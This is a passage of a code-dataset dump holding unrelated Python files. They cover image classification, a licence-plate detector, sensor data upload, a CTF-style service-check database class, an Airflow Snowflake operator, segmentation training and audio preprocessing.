[[[1,2,3],[2,3,4],[5,3,2],[5,3,1]],[[1,2,3],[2,3,4],[5,3,2]],[[1,2,3],[2,3,4],[5,3,2]],[[1,2,3],[2,3,4],[5,3,2]],[[1,2,3],[2,3,4],[5,3,2]]]\n dist_avg_data=[]\n dist_var_data=[]\n for i in dist_data:\n if i==[[],[],[],[],[]]:\n print(\"dfasd\")\n break\n print(\"=================\")\n print(i)\n print(\"=================\")\n\n x = np.array(i)\n y = x.astype(np.float)\n avg=np.average(y,axis=0)\n dist_avg_data.append(avg)\n # varsum=0\n # for j in i:\n # varsum=varsum+ (j[0]-avg[0])**2+(j[1]-avg[1])**2+(j[2]-avg[2])**2 \n # var=varsum/(np.size(i,axis=0)-1)\n # dist_var_data.append(var)\n dist_avg_data_total.append(dist_avg_data)\n print(dist_avg_data)\n# 모평균과 모분산을 모르는 경우에 대한 T-distribution 계산식\nlowdist=1\nk=0\norigin=10000000\nclusterDistance=1000000000\ncombn=itertools.permutations([1,2,3,4,5],5)\nfor l,r in enumerate(dist_avg_data_total):\n for i in combn:\n distsum=0\n for j,k in enumerate(i):\n distsum=distsum+np.linalg.norm(r[k]-data[j])**2\n if distsum < origin:\n origin = distsum\n bestCombn = combn\n if origin < clusterDistance:\n clusterDistance=origin\n cluster=l\nsaveData(data,cluster)\n\nif(cluster==0):\n print(\"This moth is ~~~1\")\nelif(cluster==1):\n print(\"This moth is ~~~2\")\nelif(cluster==2):\n print(\"This moth is ~~~3\")\nelif(cluster==3):\n print(\"This moth is ~~~4\")\n \n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"Codes/__pycache__/before/classifyMoth0701.py","file_name":"classifyMoth0701.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"471726843","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 27 18:28:25 2019\n\n@author: nguyent\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpg\n\nlargeur = 300\nlongueur = largeur*2/3\n\nc = int(longueur/2)\n\nim = np.zeros((longueur,largeur,3))\n\nim[0:c,:,:] = 255\n\nim[c:2*c,:] = [255,0,0]\n\nI, J = np.meshgrid(\\\n np.linspace(200,0,200),\\\n np.linspace(0,300,300),\\\n indexing = 'ij')\n\nim[np.logical_and(I>= J*2/3 , I <= J*-2/3+200)] = np.array([0, 0, 255], dtype = np.uint8)\n\nplt.imshow(im)\nmpg.imsave('Flag/DrapeauTcheque.png', im)","sub_path":"challenge6_drapeauTcheque.py","file_name":"challenge6_drapeauTcheque.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"509856131","text":"import thread\nimport mysql.connector\nimport time\n\n\"\"\"\nDatabase connection object\n\n- Shared between each thread\n\"\"\"\nclass Database(object): \n def __init__(self, config):\n self.config = config\n self.lock = thread.allocate_lock()\n \n self.connect()\n \n def connect(self):\n self.conn = mysql.connector.connect(**self.config)\n \n def addScore(self, team, service, status, output):\n query = \"INSERT INTO checks(team_id, service_id, time, status, output)\" \\\n \"VALUES (%s, %s, %s, %s, %s)\"\n args = (team, service, int(time.time()), status, output)\n \n self.lock.acquire()\n \n cursor = self.conn.cursor()\n cursor.execute(query, args)\n self.conn.commit()\n \n cursor.close()\n \n self.lock.release()\n \n def getTeams(self):\n result = []\n \n self.lock.acquire()\n \n cursor = self.conn.cursor()\n cursor.execute(\"SELECT * FROM teams WHERE active = 1\")\n \n row = cursor.fetchone()\n \n while row is not None:\n team_id = row[0]\n team_name = row[1]\n \n result.append({\n 'id': team_id,\n 'name': team_name,\n })\n \n row = cursor.fetchone()\n \n cursor.close()\n \n self.lock.release()\n \n return result\n \n def getTeamServices(self, team_id):\n result = []\n \n self.lock.acquire()\n \n conn = self.conn\n cursor1 = conn.cursor()\n cursor2 = conn.cursor()\n \n cursor1.execute(\"SELECT * FROM services WHERE enabled = 1\")\n row = cursor1.fetchone()\n \n while row is not None:\n service_id = row[0]\n service_name = row[1]\n module = row[2]\n \n cursor2.execute(\"SELECT `value` FROM services_data WHERE team_id = %s AND service_id = %s ORDER BY `order` ASC\", (team_id, service_id))\n \n args = []\n data = cursor2.fetchone()\n \n while data is not None:\n args.append(data[0])\n \n data = cursor2.fetchone()\n \n result.append({\n 'id': service_id,\n 'name': service_name,\n 'module': module,\n 'args': args\n })\n \n row = cursor1.fetchone()\n \n cursor1.close()\n cursor2.close()\n \n self.lock.release()\n \n return result","sub_path":"scoring/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"454887460","text":"from sklearn.metrics import precision_recall_curve\nfrom sklearn.model_selection import cross_val_predict\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ny_scores = cross_val_predict(\n sgd_clf, X_train, y_train_5, cv=3, method=\"decision_function\"\n)\nprecisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\")\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\")\n plt.xlabel(\"Threshold\")\n plt.legend(loc=\"center left\")\n plt.ylim([0, 1])\n\n\nplot_precision_recall_vs_threshold(precisions, recalls, thresholds)\nplt.show()\n","sub_path":"handson-ml/ch3/5_classifier_threshold_chart.py","file_name":"5_classifier_threshold_chart.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"387950148","text":"def isAnagram(word1, word2):\n if len(word1) == len(word2):\n ans = 'is Anagram'\n for each in word1:\n if word1.count(each) != word2.count(each):\n ans = 'not Anagram'\n return ans\n else:\n return 'not Anagram'\n\n\n################ test ############\nreply = isAnagram('potter', 'retoop')\nprint(reply)\n","sub_path":"check_isAnagram.py","file_name":"check_isAnagram.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"142347998","text":"import autocomplete_light as al\nfrom presupuesto.models import Presupuesto, OrdenDeTrabajo\nfrom django.db.models import Q\nfrom django.utils.html import escape\nfrom django.contrib.auth.models import User\n\nclass UserAutocomplete(al.AutocompleteModelBase):\n\n def choice_html(self, choice):\n \"\"\"\n Format a choice using :py:attr:`choice_html_format`.\n \"\"\"\n return self.choice_html_format % (\n escape(self.choice_value(choice)),\n escape(self.choice_label(choice.first_name+\" \"+choice.last_name)))\n \nal.register(User, UserAutocomplete, \n name='vendedor',\n search_fields=['^first_name','^last_name'],\n \n choices=User.objects.all(),\n attrs={\n 'placeholder': 'Nombre o apellido',\n 'data-autocomplete-minimum-characters': 1,\n 'style':'width:140px'\n },\n widget_attrs={\n 'data-widget-maximum-values': 10,\n})\n ","sub_path":"ventas/autocomplete_light_registry.py","file_name":"autocomplete_light_registry.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"559763815","text":"\"\"\"\nBefore continuing:\n * sudo apt-get update\n * sudo apt-get install build-essential python-dev python-openssl git\n\n * git clone https://github.com/adafruit/Adafruit_Python_DHT.git && cd Adafruit_Python_DHT\n * sudo python setup.py install\n\n * pip install requests\n\"\"\"\n\nimport Adafruit_DHT\nimport time\nimport requests\nimport math\n\nsensor = Adafruit_DHT.DHT11\npin = 14\nhumidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n\ntoken = \"\"\ndeviceLabel = \"raspberry-pi-weather-station\"\nvariableTemperature = \"temperature\"\nvariableHumidity = \"humidity\"\n\ndef buildPayload(varTemp, varHum):\n payload = {\n varTemp: int(temperature),\n varHum: int(humidity)\n }\n return payload\n\ndef postRequest(payload):\n\n # Header for HTTP request\n url = \"http://things.ubidots.com\"\n url = \"{}/api/v1.6/devices/{}\".format(url, deviceLabel)\n headers = {\"X-Auth-Token\": token, \"Content-Type\": \"application/json\"}\n\n # Make a HTTP request\n status = 400\n attempts = 0\n while status >= 400 and attempts <= 5:\n req = requests.post(url=url, headers=headers, json=payload)\n status = req.status_code\n attempts += 1\n time.sleep(1)\n\n # Process results\n if status >= 400:\n print('Error: check your credentials and internet connection')\n return False\n\n print('Info: request made properly, device is updated')\n return True\n\ndef main():\n payload = buildPayload(variableTemperature, variableHumidity)\n print('Info: attempting to send data to Ubidots')\n postRequest(payload)\n print('Info: finished')\n\nif __name__ == '__main__':\n while True:\n main()\n time.sleep(2)\n","sub_path":"2018-2019/Other/Maribor/Sensors/dht11-ubidots.py","file_name":"dht11-ubidots.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"427313899","text":"import cv2\nimport numpy as np\n\n\ndef order_points(pts):\n # initialize a list of coordinates that will be ordered\n # such that the first entry in the list is the top-left,\n # the second entry is the top-right, the third is the\n # bottom-right, and the fourth is the bottom-left\n rect = np.zeros((4, 2), dtype=\"float32\")\n\n # the top-left point will have the smallest sum, whereas\n # the bottom-right point will have the largest sum\n s = pts.sum(axis=1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = pts[np.argmax(s)]\n\n # now, compute the difference between the points, the\n # top-right point will have the smallest difference,\n # whereas the bottom-left will have the largest difference\n diff = np.diff(pts, axis=1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n\n # return the ordered coordinates\n return rect\n\n\ndef four_point_transform(image, pts):\n # obtain a consistent order of the points and unpack them\n # individually\n rect = order_points(pts)\n (tl, tr, br, bl) = rect\n\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n\n # compute the height of the new image, which will be the\n # maximum distance between the top-right and bottom-right\n # y-coordinates or the top-left and bottom-left y-coordinates\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left\n # order\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype=\"float32\")\n\n # compute the perspective transform matrix and then apply it\n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n\n # return the warped image\n return warped\n\n\ndef automatic_brightness_and_contrast(image, clip_hist_percent=10):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Calculate grayscale histogram\n hist = cv2.calcHist([gray],[0],None,[256],[0,256])\n hist_size = len(hist)\n\n # Calculate cumulative distribution from the histogram\n accumulator = []\n accumulator.append(float(hist[0]))\n for index in range(1, hist_size):\n accumulator.append(accumulator[index -1] + float(hist[index]))\n\n # Locate points to clip\n maximum = accumulator[-1]\n clip_hist_percent *= (maximum/100.0)\n clip_hist_percent /= 2.0\n\n # Locate left cut\n minimum_gray = 0\n while accumulator[minimum_gray] < clip_hist_percent:\n minimum_gray += 1\n\n # Locate right cut\n maximum_gray = hist_size -1\n while accumulator[maximum_gray] >= (maximum - clip_hist_percent):\n maximum_gray -= 1\n\n # Calculate alpha and beta values\n alpha = 255 / (maximum_gray - minimum_gray)\n beta = -minimum_gray * alpha\n\n auto_result = cv2.convertScaleAbs(image, alpha=alpha, beta=beta)\n return auto_result, alpha, beta\n\n\ndef detect_belg(src):\n img, alpha, beta = automatic_brightness_and_contrast(src)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, th = cv2.threshold(gray, 120, 255, cv2.THRESH_BINARY)\n\n contours, hierarchy = cv2.findContours(th, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n cv2.imwrite('temp/blurred.png', src)\n\n crops = []\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n\n if h * 6 > w > 2 * h and h > 0.1 * w and w * h > img.shape[0] * img.shape[1] * 0.0001:\n crop = th[y:y + h, x:x + w]\n\n # Compute sum of white pixels\n white_summation = crop.sum()\n if white_summation > w * h * 0.4 * 255:\n # Compute sum of red pixel\n crop = img[y:y + h, x:x + w]\n crop_img = crop.astype('uint8')\n hsv = cv2.cvtColor(crop_img, cv2.COLOR_BGR2HSV)\n lower_red = np.array([160, 100, 100])\n upper_red = np.array([179, 255, 255])\n red_mask = cv2.inRange(hsv, lower_red, upper_red)\n red_summation = red_mask.sum()\n\n if red_summation > 510:\n crop_img = img[y:y + h, x - round(w / 10):x + w]\n crop_img = crop_img.astype('uint8')\n hsv = cv2.cvtColor(crop_img, cv2.COLOR_BGR2HSV)\n low_bleu = np.array([100, 150, 0])\n high_bleu = np.array([140, 255, 255])\n bleu_mask = cv2.inRange(hsv, low_bleu, high_bleu)\n bleu_summation = bleu_mask.sum()\n\n if bleu_summation > 255:\n\n crop = gray[y:y + h, x:x + w]\n crop_img = crop.astype('uint8')\n th2 = cv2.adaptiveThreshold(crop_img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY,\n 11, 2)\n\n contours2, hierarchy = cv2.findContours(th2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n j = 0\n for c in contours2:\n area2 = cv2.contourArea(c)\n x2, y2, w2, h2 = cv2.boundingRect(c)\n if w2 * h2 > h * w * 0.01 and h2 > w2 and area2 < h * w * 0.9:\n j += 1\n\n if 12 > j > 4:\n rect = cv2.minAreaRect(cnt)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n pts = np.array(box)\n warped = four_point_transform(src, pts)\n crops.append(warped)\n\n cv2.drawContours(src, [box], 0, (0, 255, 0), 2)\n\n image = cv2.imread('temp/blurred.png')\n blurred_image = cv2.GaussianBlur(image, (43, 43), 30)\n mask = np.zeros(image.shape, dtype=np.uint8)\n channel_count = image.shape[2]\n ignore_mask_color = (255,) * channel_count\n cv2.fillPoly(mask, np.int32([box]), ignore_mask_color)\n mask_inverse = np.ones(mask.shape).astype(np.uint8) * 255 - mask\n final_image = cv2.bitwise_and(blurred_image, mask) + cv2.bitwise_and(image, mask_inverse)\n cv2.imwrite(\"temp/blurred.png\", final_image)\n return src, crops\n\n\ndef process(src):\n\n # Brigthness and contrast adjustment\n adjusted, a, b = automatic_brightness_and_contrast(src)\n # BGR to gray\n gray = cv2.cvtColor(adjusted, cv2.COLOR_BGR2GRAY)\n # Binary thresh\n #ret, th = cv2.threshold(gray, 140, 255, cv2.THRESH_BINARY)\n ret, th = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n return th\n","sub_path":"Belgian_anpr/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"398670127","text":"import tensorflow as tf\nimport numpy as np\nfrom accuracy import *\nfrom DataReader import *\nfrom DRN import *\nimport os\nfrom dice import *\n\ntf.reset_default_graph()\ndirectory = os.getcwd()\n\ntrain_file = os.path.join(directory, 'data', 'train.txt')\ntest_file = os.path.join(directory, 'data', 'val.txt')\nlogs = os.path.join(directory, 'logs')\ntrainloss = os.path.join(logs, 'train_loss.txt')\n\n\nif os.path.isdir(logs) == False:\n os.makedirs(logs)\n\n# choose network, can be either DRN18 or DRN26\nnetwork = 'DRN26'\n# set parameters\nbatch_size=8\nnum_epochs=100\nuse_weights = 1\nnum_classes = 5\nimage_dims=[500,500,3]\n\ndata = DataReader(directory, batch_size, num_epochs, use_weights=1)\ntrain_data = data.train_batch(train_file)\nnum_train_images = data.num_images\n\ntest_data = data.test_batch(test_file)\nnum_val_images = data.num_images\n\n# determine number of iterations based on number of images\ntraining_iterations = int(np.floor(num_train_images/batch_size))\nvalidation_iterations = int(np.floor(num_val_images/batch_size))\n\nhandle = tf.placeholder(tf.string, shape=[])\n# create iterator allowing us to switch between datasets\niterator = tf.data.Iterator.from_string_handle(handle, train_data.output_types, train_data.output_shapes)\nnext_element = iterator.get_next()\ntraining_iterator = train_data.make_initializable_iterator()\nval_iterator = test_data.make_initializable_iterator()\n\n# create placeholder for train or test\ntrain_network = tf.placeholder(tf.bool, [])\n\n# get images and pass into network\nimage, label, weight = next_element\ndrn = DRN(image, image_dims, batch_size, num_classes, train_network, network)\n\n# get predictions and logits\nprediction = drn.pred\nlogits = drn.prob\nlabel = tf.squeeze(label, 3)\n\n# resize the logits using bilinear interpolation\nimsize = tf.constant([iamge_dims[0], image_dims[1]], dtype=tf.int32)\nlogits = tf.image.resize_bilinear(logits, imsize)\nprediction = tf.argmax(logits, 3)\nprint('Resized shape is {}'.format(logits.get_shape()))\n\n \n# compute loss\nif use_weights == 1:\n label_one_hot = tf.one_hot(label, num_classes)\n loss = tf.nn.softmax_cross_entropy_with_logits(labels=label_one_hot, logits=logits)\n loss = loss*tf.squeeze(weight, 3)\nelse:\n # use sparse with flattened labelmaps\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=label, logits=logits)\nloss = tf.reduce_mean(loss)\n\n#loss = dice(logits, label, num_classes, use_weights=1)\n\n# create summary\ntf.summary.scalar('loss', loss)\ntf.summary.image('images', image)\ntf.summary.image('predictions', tf.cast(tf.expand_dims(prediction, 3), dtype=tf.uint8))\ntf.summary.image('labels', tf.cast(tf.expand_dims(label, 3), dtype=tf.uint8))\n\n\n# add weights with of first layer\nprint(tf.trainable_variables())\nfor var in tf.trainable_variables():\n if'_1' in var.name:\n tf.summary.histogram(var.name, var)\n#tf.summary.scalar('learning_rate', learning_rate)\nmerged = tf.summary.merge_all()\ntrain_writer = tf.summary.FileWriter(logs, tf.get_default_graph())\n\n# global step to keep track of iterations\nglobal_step = tf.Variable(0, trainable=False, name='global_step')\n\n# create placeholder for learning rate\nlearning_rate = tf.placeholder(tf.float32, shape=[])\n\n# training \ntraining = tf.train.AdamOptimizer(learning_rate).minimize(loss, global_step)\n\nsaver = tf.train.Saver(max_to_keep=3)\ninit = tf.global_variables_initializer()\n\nplt.figure(figsize=(18, 16))\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\n\nwith tf.Session(config=config) as sess:\n training_handle = sess.run(training_iterator.string_handle())\n validation_handle = sess.run(val_iterator.string_handle())\n \n sess.run(training_iterator.initializer)\n # initialize variables \n sess.run(init)\n \n # check if checkpiont exists\n ckpt = tf.train.get_checkpoint_state(logs)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path) \n print('Restoring session at step {}'.format(global_step.eval()))\n \n iteration = global_step.eval()\n current_epoch = int(np.ceil(iteration/training_iterations)) \n \n while current_epoch < num_epochs:\n print(training_iterations)\n current_epoch = int(np.ceil(iteration/training_iterations)) \n i = 1\n while i <= training_iterations:\n _, l = sess.run([training, loss], feed_dict={handle:training_handle, learning_rate:0.0001, train_network:True})\n iteration = global_step.eval()\n i = iteration - ((current_epoch-1)*training_iterations) \n\n if iteration % 10 == 0:\n print('Training loss Epoch {} step {}, {} :{}'.format(current_epoch, iteration, i, l))\n # write loss to file\n with open(trainloss, 'a') as f: \n f.write(\"Epoch: {} Step: {} Loss: {}\\n\".format(current_epoch, iteration, l))\n f.close()\n\n if (iteration %250 == 0) and (iteration > 0):\n # write summary to file\n summary = sess.run(merged, feed_dict={handle:training_handle})\n train_writer.add_summary(summary, iteration)\n # save session\n print('Saving session at epoch {} step: {}'.format(current_epoch, iteration))\n saver.save(sess, logs + '/model.ckpt', global_step)\n\n \n sess.run(val_iterator.initializer)\n total_loss = 0\n for i in range(validation_iterations):\n print('validation step: {}'.format(i))\n img, lbl, wgt = next_element\n val_loss, img, lbl, wgt, pred = sess.run([loss, img, lbl, wgt, prediction], feed_dict={handle:validation_handle, train_network:False})\n total_loss += val_loss\n lbl = np.squeeze(lbl, 3)\n # evaluate accuracy\n accuracy = Jaccard(lbl, pred, num_classes)\n dice_score = DICE(lbl, pred, num_classes)\n\n if (i % 100 == 0) and (i >0):\n plt.subplot(131)\n img_temp = (img + abs(img.min()))/((abs(img.min()) + img.max()))\n plt.imshow(img_temp[0, :, :, :])\n plt.subplot(132)\n plt.imshow(np.squeeze(lbl[0, :, :]))\n # view prediction\n plt.subplot(133)\n plt.imshow(pred[0, :, :])\n plt.show()\n\n print(accuracy)\n print(dice_score)\n \nf.close()","sub_path":"train_network.py","file_name":"train_network.py","file_ext":"py","file_size_in_byte":6046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"652896196","text":"from pathlib import Path\n\nCUR_DIR = Path(__file__).resolve().parent\nDATA_FOLDER = CUR_DIR / 'sorted_files'\nFILES = [file for file in DATA_FOLDER.iterdir() if file.is_file() and file.suffix == '.txt']\n\n\ndef get_files_data_sorted_by_number_of_lines(files_path: list) -> list:\n \"\"\"\n Gets a list of paths to .txt files and returns a list of dictionaries with the name, the number of lines (length)\n and the content of .txt files\n\n Args:\n files_path (list): list of paths to .txt files\n\n Returns: A list of dictionaries\n\n \"\"\"\n list_of_file_parameters = []\n for file in files_path:\n file_parameters = {}\n with open(file, 'r', encoding='utf-8-sig') as f:\n content = f.read().splitlines()\n file_parameters['name'] = file.name\n file_parameters['length'] = len(content)\n file_parameters['content'] = content\n list_of_file_parameters.append(file_parameters)\n return sorted(list_of_file_parameters, key=lambda file_param: file_param[\"length\"])\n\n\ndef create_merged_file(merged_file_folder, files_path: list, merged_file_name: str):\n \"\"\"Gets a list of paths to .txt files, merged them and creates a new .txt file\n\n Args:\n merged_file_folder (path) : path to the folder to contain the merged file\n files_path (list): list of paths to the .txt files to merge\n merged_file_name (str): given name to the new file\n \"\"\"\n\n list_of_file_param = get_files_data_sorted_by_number_of_lines(files_path)\n merged_file_folder.mkdir(exist_ok=True)\n with open(f'{merged_file_folder}/{merged_file_name}.txt', 'w', encoding='utf-8-sig') as new_file:\n for i in range(len(list_of_file_param)):\n new_file.write(list_of_file_param[i]['name'] + '\\n')\n new_file.write(str(list_of_file_param[i]['length']) + '\\n')\n for j in range(len(list_of_file_param[i]['content'])):\n # To avoid adding an empty line at the end of the file\n n = '' if i == len(list_of_file_param) - 1 and j == len(list_of_file_param[i]['content']) - 1 else '\\n'\n new_file.write(list_of_file_param[i]['content'][j] + n)\n\n\ncreate_merged_file(CUR_DIR / 'merged_file', FILES, 'merged_files')\n","sub_path":"merging_files.py","file_name":"merging_files.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"647667177","text":"from airflow.hooks.S3_hook import S3Hook\nfrom airflow.plugins_manager import AirflowPlugin\nfrom airflow.models import BaseOperator\nfrom snowflake_plugin.hooks.snowflake_hook import SnowflakeHook\n\n\nclass SnowflakeOperator(BaseOperator):\n\n def __init__(self,\n query=None,\n query_file=None,\n role='public',\n snowflake_conn_id='snowflake_default',\n *args, **kwargs):\n\n super(SnowflakeOperator, self).__init__(*args, **kwargs)\n self.snowflake_conn_id = snowflake_conn_id\n self.query_or_sequence = query \n self.query_file= query_file\n self.role = role\n\n\n def execute(self, context):\n hook = SnowflakeHook(snowflake_conn_id=self.snowflake_conn_id).get_conn()\n cs = hook.cursor()\n cs.execute(\"USE WAREHOUSE {0}\".format(hook.warehouse))\n cs.execute(\"USE DATABASE {0}\".format(hook.database))\n cs.execute(\"USE ROLE {0}\".format(self.role))\n \n if self.query_or_sequence is None and self.query_file is None:\n raise Exception('query or query_file must be supplied to the operator')\n\n if self.query_or_sequence is not None:\n if isinstance(self.query_or_sequence, list):\n query_sequence = self.query_or_sequence\n else:\n query_sequence = [self.query_or_sequence]\n\n for query in query_sequence:\n cs.execute(query)\n\n if self.query_file is not None:\n if isinstance(self.query_file, list):\n files_sequence = self.query_file\n else:\n files_sequence = [self.query_file]\n\n for path in files_sequence:\n query = open(path,'r').read()\n cs.execute(query)\n","sub_path":"operators/snowflake_operator.py","file_name":"snowflake_operator.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"12488060","text":"favorite_languages = {\n\t'jen': 'python',\n\t'sarah': 'c',\n\t'edward': 'ruby',\n\t'phil': 'python',\n}\n\ntakePollPeople = [\"jen\",\"josh\",\"JC\"]\nfor i in takePollPeople:\n\tfor k, v in favorite_languages.items():\n\t\t#print(name.title() + \"'s favorite language is \" + language.title()+\".\")\n\t\tif i == k:\n\t\t\tt = 1\n\tif t == 1:\n\t\tt=0\n\t\tprint(\"Thank you \"+i+\" for taking the quiz!\")\n\telse:\n\t\tprint(\"OMG!!!! JUST TAKE THE QUIZ \"+i.upper()+\"!!!!!!!!!\")","sub_path":"Part 1: Basics/Chapter 6: Dictionaries/6-6:polling.py","file_name":"6-6:polling.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"7602077","text":"import os\nimport sys\n#sys.path.append(os.path.dirname(__file__))\n#sys.path.append('..')\n#sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))\nimport math\nimport numpy as np\nfrom scipy.signal import get_window\nimport librosa.util as librosa_util\nimport librosa\nfrom concurrent.futures import ProcessPoolExecutor\nfrom functools import partial\nfrom tqdm import tqdm\nfrom shutil import copyfile\nimport argparse\n\nimport torch, torch.nn as nn, torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\n\nif __package__ == '':\n from stts import audio, audio_util, util\nelse:\n from .stts import audio, audio_util, util\n \n \n \ndef _make_metafile(dir_base, subdir='train_data_01', metafile='train_meta.txt'):\n meta = []\n dir_data = os.path.join(dir_base, subdir)\n for a, b, c in os.walk(dir_data):\n if len(c) == 0:\n continue\n for fname in c:\n if 'txt' in fname:\n fpath = os.path.join(a, fname)\n with open(fpath, 'r') as f:\n lines = f.readlines()\n for line in lines:\n try:\n line = line.strip()\n idx_sep = line.index(' ')\n _flacfile = line[:idx_sep] + '.flac'\n _script = line[idx_sep+1:]\n except:\n continue\n else:\n _meta = (os.path.join(a[len(dir_base)+1:], _flacfile), _script)\n meta.append(_meta) \n with open(os.path.join(dir_base, metafile), 'w') as f:\n lines = ''\n for _meta in meta:\n lines += '|'.join(_meta) + '\\n'\n f.write(lines[:-1])\n return meta\n\ndef make_metafiles(dir_base, subdir_train='train_data_01', subdir_test='test_data_01'):\n _make_metafile(dir_base, subdir=subdir_train, metafile='train_meta.txt')\n _make_metafile(dir_base, subdir=subdir_test, metafile='test_meta.txt')\n \n\ndef read_metadata(data_dir, metafile='meta.txt'): \n metadata_path = os.path.join(data_dir, metafile)\n with open(metadata_path, 'r') as f:\n lines = f.readlines()\n meta = []\n for line in lines:\n wpath, ntext = line.strip().split('|')\n if ntext.endswith('\\n'):\n ntext = ntext[:-1]\n fname = wpath.split('/')[-1][:-5]\n meta.append((fname, os.path.join(data_dir, wpath), ntext))\n return meta\n\ndef preprocess(data_dir, metafile, out_subdir='train', sample_rate=22050, n_fft=1024, win_length=None, \n hop_length=None, n_mels=80, mono=True, trim_db=None, decibel=True, normalize=True):\n meta = read_metadata(data_dir, metafile)\n out_dir = os.path.join(data_dir, out_subdir)\n process_wavfiles(meta, out_dir, sample_rate, trim_db, mono, n_fft, win_length, hop_length, n_mels, decibel, normalize)\n \n\n\n\ndef process_wavfiles(meta, out_dir, sample_rate=22050, trim_db=None, mono=True, n_fft=1024, win_length=None, hop_length=None, \n n_mels=80, decibel=True, normalize=True):\n if win_length is None:\n win_length = n_fft\n if hop_length is None:\n hop_length = int(win_length / 4)\n _spec_dir = 'spec'\n _mel_dir = 'mel'\n spec_dir = os.path.join(out_dir, _spec_dir)\n mel_dir = os.path.join(out_dir, _mel_dir)\n meta_path = os.path.join(out_dir, 'meta.txt')\n \n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n if not os.path.exists(spec_dir):\n os.mkdir(spec_dir)\n if not os.path.exists(mel_dir):\n os.mkdir(mel_dir)\n wav_paths = []\n spec_paths = []\n mel_paths = []\n _meta = []\n for fname, path, ntext in meta:\n wav_paths.append(path)\n spec_file = fname + '.spec.npy'\n mel_file = fname + '.mel.npy'\n spec_path = os.path.join(spec_dir, spec_file)\n mel_path = os.path.join(mel_dir, mel_file)\n spec_paths.append(spec_path)\n mel_paths.append(mel_path)\n _meta.append((fname, ntext, os.path.join(_spec_dir, spec_file), os.path.join(_mel_dir, mel_file)))\n \n n_frames = audio_util.wav_to_spec_save_many(wav_paths, sample_rate, trim_db, mono, n_fft, win_length, hop_length, n_mels, \n spec_paths, None, mel_paths, decibel, normalize)\n with open(meta_path, 'w') as f: \n for i, m in enumerate(_meta):\n f.write(m[0] + '|' + m[1] + '|' + str(n_frames[i]) + '|' + m[2] + '|' + m[3] + '\\n')\n \n with open(os.path.join(out_dir, 'settings.txt'), 'w') as f:\n f.write('sample_rate:' + str(sample_rate) + '\\n')\n f.write('n_fft:' + 